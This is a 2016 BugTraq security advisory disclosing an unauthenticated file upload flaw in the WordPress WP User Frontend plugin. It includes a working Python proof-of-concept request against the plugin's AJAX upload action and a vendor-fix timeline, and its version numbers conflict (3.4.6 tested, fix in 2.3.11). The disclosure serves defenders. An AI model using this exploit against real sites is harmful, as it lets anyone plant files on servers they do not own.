BugTraq
WordPress WP User Frontend Plugin [Unrestricted File Upload] Feb 08 2016 01:49PM
Panagiotis Vagenas (pan vagenas gmail com)
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File
Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: 3.4.6
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress

Description
-----------

WordPress plugin _WP User Frontend_ suffers from an unrestricted file
uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or
`wpuf_insert_image` actions to upload any file which pass the WordPress
mime and size checks.

The attack does not require any privilege to be performed. The mentioned
actions are available to non-privileged users also, thus allowing to
anyone uploading files to the web server.

PoC
---

```
#!/usr/bin/python3

########################################################################
########
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas (at) gmail (dot) com [email concealed]>
########################################################################
########

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
print('Success!')
print(r.text)
else:
print('error')

exit(0)

```

Timeline
--------

1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus